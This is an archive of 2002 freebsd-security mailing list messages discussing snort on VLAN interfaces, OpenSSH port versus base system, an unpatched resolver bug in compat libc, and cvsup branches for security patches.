(envelope-from twigles@yahoo.com) Message-ID: <20020701170542.79357.qmail@web10106.mail.yahoo.com> Received: from [68.5.49.41] by web10106.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 10:05:42 PDT Date: Mon, 1 Jul 2002 10:05:42 -0700 (PDT) From: twig les Subject: Re: snort + vlans To: "Dmitry S. Rzhavin" , security@FreeBSD.ORG In-Reply-To: <3D2088A8.CCE2540F@rt.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That's a switch config problem, and the answer depends on your type of switch. --- "Dmitry S. Rzhavin" wrote: > Hello! > I have number of vlans on my box, all af them > configured on xl0. > So, xl0 does not have any ip address, but it is > turned up. > Now I want to start snort on this box. 'snort -i > what' shall I > tell to make snort listen and analyze my traffic? > > And, if I asked about vlans... What about vtp in > Free? Does > Free knows vtp, how to configure it, and what vtp > mode does > FreeBSD operate? > > Thank you. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:16:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD46737B400 for ; Mon, 1 Jul 2002 10:16:25 -0700 (PDT) Received: from balrog.rt.ru (balrog.rt.ru [217.107.221.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 97A4543E39 for ; Mon, 1 Jul 2002 10:16:21 -0700 (PDT) (envelope-from dima@rt.ru) Received: from rt.ru (localhost [127.0.0.1]) by balrog.rt.ru (8.9.3/8.9.3) with ESMTP id VAA29517; Mon, 1 Jul 2002 21:13:50 +0400 (MSD) (envelope-from dima@rt.ru) Message-ID: <3D208DCE.F4379E7A@rt.ru> Date: Mon, 01 Jul 2002 21:13:50 +0400 From: "Dmitry S. Rzhavin" Organization: Rostelecom X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-20000103-CURRENT i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: twig les Cc: security@FreeBSD.ORG Subject: Re: snort + vlans References: <20020701170542.79357.qmail@web10106.mail.yahoo.com> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org twig les wrote: > > That's a switch config problem, and the answer depends > on your type of switch. Cisco 2924 All vlans works well. I just wander if snort can listen ifaceas like vlanXX. Does it? > > --- "Dmitry S. Rzhavin" wrote: > > Hello! > > I have number of vlans on my box, all af them > > configured on xl0. > > So, xl0 does not have any ip address, but it is > > turned up. > > Now I want to start snort on this box. 'snort -i > > what' shall I > > tell to make snort listen and analyze my traffic? > > > > And, if I asked about vlans... What about vtp in > > Free? Does > > Free knows vtp, how to configure it, and what vtp > > mode does > > FreeBSD operate? > > > > Thank you. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > ===== > ----------------------------------------------------------- > Only fools have all the answers. > ----------------------------------------------------------- > > __________________________________________________ > Do You Yahoo!? > Yahoo! - Official partner of 2002 FIFA World Cup > http://fifaworldcup.yahoo.com -- The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:27: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7686637B400 for ; Mon, 1 Jul 2002 10:27:06 -0700 (PDT) Received: from balrog.rt.ru (balrog.rt.ru [217.107.221.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DDB743E0A for ; Mon, 1 Jul 2002 10:27:03 -0700 (PDT) (envelope-from dima@rt.ru) Received: from rt.ru (localhost [127.0.0.1]) by balrog.rt.ru (8.9.3/8.9.3) with ESMTP id VAA29535; Mon, 1 Jul 2002 21:24:28 +0400 (MSD) (envelope-from dima@rt.ru) Message-ID: <3D20904C.8AF8703C@rt.ru> Date: Mon, 01 Jul 2002 21:24:28 +0400 From: "Dmitry S. Rzhavin" Organization: Rostelecom X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-20000103-CURRENT i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: mike.jablonski@abnamrousa.com, security@FreeBSD.ORG Subject: Re: snort + vlans References: <072290CFDAAC1F4A8A5853B20A9ADF4A2B0EB0@MES3> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org mike.jablonski@abnamrousa.com wrote: > > you need to enable the span port feature. > Sorry, seems my explain was too bad. I have internal FW. It is connected to cat2924 with xl0 at 100Mbit. Switch port is in trunk mode. there is 2 vlans on xl0: vlan0 and vlan1. There is no ip on xl0. My defaultouter (cisco 26XX) is in vlan0 (trunk too). My office subnet is on vlan1 (all office hosts configured as vlan 1 on switch). So, my box works as router+FW between vlan0 and vlan1. Now it works. So, I want to setup snort to detect attacks. What iface (xl0, vlan0, or what) shall I bind snort (snort -i flag) to make it analyze both internal and external traffic? Another question is: cisco detects vlans with vtp protocol. Does FreeBSD supports it? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:45:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 53C0137B400; Mon, 1 Jul 2002 10:45:42 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6D80643E0A; Mon, 1 Jul 2002 10:45:39 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.4/8.12.4) with ESMTP id g61Hj64W007160; Mon, 1 Jul 2002 19:45:09 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g61Hj541007131; Mon, 1 Jul 2002 19:45:05 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG, nectar@FreeBSD.ORG Message-ID: <6WBaUgg1nC@dmeyer.dinoex.sub.org> From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Re[2]: openssh OR openssh-portable Date: Mon, 01 Jul 2002 19:39:55 +0200 X-Mailer: Dinoex 1.77 References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <20020701143038.GM4764@madman.nectar.cc> <20020701144043.GQ4764@madman.nectar.cc> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-Accept-Language: de,en X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-No-Archive: yes X-ZC-VIA: 20020701000000S+2@dinoex.sub.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jacques A. Vidrine wrote: > On Mon, Jul 01, 2002 at 04:37:23PM +0200, Dag-Erling Smorgrav wrote: > > "Jacques A. Vidrine" writes: > > > Of course, OpenSSH 3.4 is always available via the Ports Collection, > > > and I would, in fact, recommend that users take advantage of it and > > > turn on PrivilegeSeperation if at all possible. > > > > I wouldn't - the port needs quite a bit of work and is too much of a > > moving target right now :( > > I'll have us agree by defining `if at all possible' to include a stable, > working OpenSSH port :-) > > I'm sure Dirk is ready and willing to fix any problems that crop up. > I think that the port currently provides the functionality needed by a > large cross-section of users. Sure, if you find any problem, let me know. I try to sync my patches with current, But I can't test all configurations/options. I think I need a testbed / regression test, where we can test at least the FreeBSD extensions to work as expected. Anything urgen functions needed we might copy from cvs and add as pacthes to teh ports. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10:53: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D290237B400 for ; Mon, 1 Jul 2002 10:53:02 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id E681C43E0A for ; Mon, 1 Jul 2002 10:53:01 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 3E34134; Mon, 1 Jul 2002 12:53:01 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61Hr14N009088; Mon, 1 Jul 2002 12:53:01 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61Hr04t009087; Mon, 1 Jul 2002 12:53:00 -0500 (CDT) Date: Mon, 1 Jul 2002 12:53:00 -0500 From: "Jacques A. Vidrine" To: "Lachlan O'Dea" Cc: freebsd-security@freebsd.org Subject: Re: resolv and dynamic linking to compat libc Message-ID: <20020701175300.GG8128@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Lachlan O'Dea , freebsd-security@freebsd.org References: <3D1AA5F2.9020305@ca.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D1AA5F2.9020305@ca.com> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 03:43:14PM +1000, Lachlan O'Dea wrote: > Hi, > > With regard the resolv vulnerability, is there any issue with older > binaries that are linking against an older libc.so? For example, on my > box I have a /usr/lib/compat/libc.so.3. Will a make world fix this > library as well? No, I'm afraid not. libc.so.3 will not be rebuilt in the usual sense of the word, thus leaving binaries that link against it vulnerable. I don't have a solution for you at the moment, but once we've patched RELENG_3 (FreeBSD 3.x), then perhaps we'll be able to get there. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11: 2:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9FA5F37B400 for ; Mon, 1 Jul 2002 11:02:54 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7153E43E0A for ; Mon, 1 Jul 2002 11:02:53 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g61I2rJU093485 for ; Mon, 1 Jul 2002 11:02:53 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g61I2rid093481 for security@freebsd.org; Mon, 1 Jul 2002 11:02:53 -0700 (PDT) Date: Mon, 1 Jul 2002 11:02:53 -0700 (PDT) Message-Id: <200207011802.g61I2rid093481@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:14:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 03EC337B400; Mon, 1 Jul 2002 11:14:20 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id CF56543E09; Mon, 1 Jul 2002 11:14:18 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA06618; Mon, 1 Jul 2002 12:14:07 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701120628.023147e0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 12:14:00 -0600 To: "Jacques A. Vidrine" , "Lachlan O'Dea" From: Brett Glass Subject: Re: resolv and dynamic linking to compat libc Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020701175300.GG8128@madman.nectar.cc> References: <3D1AA5F2.9020305@ca.com> <3D1AA5F2.9020305@ca.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:53 AM 7/1/2002, Jacques A. Vidrine wrote: >No, I'm afraid not. libc.so.3 will not be rebuilt in the usual sense >of the word, thus leaving binaries that link against it vulnerable. In that case, has the binary package including it been taken offline? It's unethical to leave it where it might be downloaded. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:15:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C8DA337B400 for ; Mon, 1 Jul 2002 11:15:30 -0700 (PDT) Received: from antalya.lupe-christoph.de (pD9E886D1.dip0.t-ipconnect.de [217.232.134.209]) by mx1.FreeBSD.org (Postfix) with ESMTP id B45D043E0A for ; Mon, 1 Jul 2002 11:15:29 -0700 (PDT) (envelope-from lupe@lupe-christoph.de) Received: by antalya.lupe-christoph.de (Postfix, from userid 1000) id 1B4E6786; Mon, 1 Jul 2002 20:15:27 +0200 (CEST) Date: Mon, 1 Jul 2002 20:15:27 +0200 To: Dag-Erling Smorgrav Cc: Chris Johnson , security@freebsd.org Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. Message-ID: <20020701181527.GI16936@lupe-christoph.de> References: <200206301817.EAA05639@caligula.anu.edu.au> <20020701135719.GA65770@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i From: lupe@lupe-christoph.de (Lupe Christoph) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Monday, 2002-07-01 at 16:01:34 +0200, Dag-Erling Smorgrav wrote: > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. May I ask you to join the OpenBSD crowd? You'd fit right in. (Ducks and runs from crossfire.) Lupe Christoph -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | I have challenged the entire ISO-9000 quality assurance team to a | | Bat-Leth contest on the holodeck. They will not concern us again. | | http://public.logica.com/~stepneys/joke/klingon.htm | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:18:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 15E7837B400 for ; Mon, 1 Jul 2002 11:18:08 -0700 (PDT) Received: from antalya.lupe-christoph.de (pD9E886D1.dip0.t-ipconnect.de [217.232.134.209]) by mx1.FreeBSD.org (Postfix) with ESMTP id 77FB143E09 for ; Mon, 1 Jul 2002 11:18:07 -0700 (PDT) (envelope-from lupe@lupe-christoph.de) Received: by antalya.lupe-christoph.de (Postfix, from userid 1000) id A37B7786; Mon, 1 Jul 2002 20:18:06 +0200 (CEST) Date: Mon, 1 Jul 2002 20:18:06 +0200 To: Dag-Erling Smorgrav Cc: Eric Anderson , freebsd-security@freebsd.org Subject: Re: SSH Patches Message-ID: <20020701181806.GJ16936@lupe-christoph.de> References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> <3D2060F9.9FA544B7@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i From: lupe@lupe-christoph.de (Lupe Christoph) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Monday, 2002-07-01 at 16:07:44 +0200, Dag-Erling Smorgrav wrote: > Eric Anderson writes: > > Heheheh. I won't argue with you there. However, still better than MS's: > > No default install without a remote root in over 20 years. > I think you're wrong here. They didn't have a networking stack before > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten > years. So it's no remote in a default install for the first ten years? Lupe Christoph -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | I have challenged the entire ISO-9000 quality assurance team to a | | Bat-Leth contest on the holodeck. They will not concern us again. | | http://public.logica.com/~stepneys/joke/klingon.htm | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:21: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2E6E337B4CA for ; Mon, 1 Jul 2002 11:21:00 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4F86143E1A for ; Mon, 1 Jul 2002 11:20:59 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g61IKw222334 for ; Mon, 1 Jul 2002 14:20:58 -0400 (EDT) Date: Mon, 1 Jul 2002 14:20:58 -0400 (EDT) From: Ralph Huntington To: Subject: security fixes Message-ID: <20020701141839.V50179-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org With all the traffic surrounding these recent vulnerabilities, it's a little confusing to know what one has to do and need not do. Let me ask this one question, please: In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ??? Or should they all get RELENG_4 ? Thank you, Ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:22:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A53C37B405 for ; Mon, 1 Jul 2002 11:22:38 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 694D143E13 for ; Mon, 1 Jul 2002 11:22:37 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D9C1A34; Mon, 1 Jul 2002 13:22:36 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61IMZ4N009401; Mon, 1 Jul 2002 13:22:35 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61IMZe9009400; Mon, 1 Jul 2002 13:22:35 -0500 (CDT) Date: Mon, 1 Jul 2002 13:22:34 -0500 From: "Jacques A. Vidrine" To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: resolv and dynamic linking to compat libc Message-ID: <20020701182234.GO8128@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Brett Glass , freebsd-security@FreeBSD.ORG References: <3D1AA5F2.9020305@ca.com> <3D1AA5F2.9020305@ca.com> <4.3.2.7.2.20020701120628.023147e0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020701120628.023147e0@localhost> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 01, 2002 at 12:14:00PM -0600, Brett Glass wrote: > At 11:53 AM 7/1/2002, Jacques A. Vidrine wrote: > > >No, I'm afraid not. libc.so.3 will not be rebuilt in the usual sense > >of the word, thus leaving binaries that link against it vulnerable. > > In that case, has the binary package including it been taken offline? No. > It's unethical to leave it where it might be downloaded. Gee, I guess we better get cracking to take offline every previous version of libc, too --- which would mean every version of FreeBSD and who knows what else. Hmm, and any applications that may have been statically linked with any of them. How about you help out by enumerating every copy on the Internet, along with contact information for each? That would be much appreciated. Thanks. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:32: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5181037B400 for ; Mon, 1 Jul 2002 11:31:56 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7D28743E0A for ; Mon, 1 Jul 2002 11:31:55 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g61IVp112680; Mon, 1 Jul 2002 13:31:51 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g61IVpq10414; Mon, 1 Jul 2002 13:31:51 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g61IVm510407; Mon, 1 Jul 2002 13:31:48 -0500 (CDT) Message-ID: <3D20A014.5B44DA36@centtech.com> Date: Mon, 01 Jul 2002 13:31:48 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Lupe Christoph Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> <3D2060F9.9FA544B7@centtech.com> <20020701181806.GJ16936@lupe-christoph.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lupe Christoph wrote: > > > > No default install without a remote root in over 20 years. > > > I think you're wrong here. They didn't have a networking stack before > > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten > > years. > > So it's no remote in a default install for the first ten years? Wo! Read it again: No default install without a remote root in over 20 years. should be: No default install without a remote root in over 10 years. The other way would be very wrong (remember, we are talking about the big evil here). Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:34: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9854337B400 for ; Mon, 1 Jul 2002 11:34:01 -0700 (PDT) Received: from tomts5-srv.bellnexxia.net (tomts5.bellnexxia.net [209.226.175.25]) by mx1.FreeBSD.org (Postfix) with ESMTP id B6DDD43E0A for ; Mon, 1 Jul 2002 11:34:00 -0700 (PDT) (envelope-from bryanf@samurai.com) Received: from localhost ([65.95.166.69]) by tomts5-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020701183347.OBOE1514.tomts5-srv.bellnexxia.net@localhost> for ; Mon, 1 Jul 2002 14:33:47 -0400 Date: Mon, 1 Jul 2002 14:33:59 -0400 Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) From: Bryan Fullerton To: freebsd-security@FreeBSD.ORG Content-Transfer-Encoding: 7bit In-Reply-To: Message-Id: <1C14F186-8D21-11D6-BBF9-0003936377F0@samurai.com> X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Monday, July 1, 2002, at 10:01 AM, Dag-Erling Smorgrav wrote: > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. So the OpenSSH included with 4.6-RELEASE-p1 is as secure or more secure than the port install of OpenSSH 3.4p1? If this is the case I'll switch back to the base install and delete the port. Bryan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 11:50:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3F7F537B400 for ; Mon, 1 Jul 2002 11:50:49 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 938D043E09 for ; Mon, 1 Jul 2002 11:50:48 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g61IolDK078910; Mon, 1 Jul 2002 14:50:48 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g61IolTT078907; Mon, 1 Jul 2002 14:50:47 -0400 (EDT) (envelope-from wollman) Date: Mon, 1 Jul 2002 14:50:47 -0400 (EDT) From: Garrett Wollman Message-Id: <200207011850.g61IolTT078907@khavrinen.lcs.mit.edu> To: Dag-Erling Smorgrav Cc: security@FreeBSD.ORG Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. In-Reply-To: References: 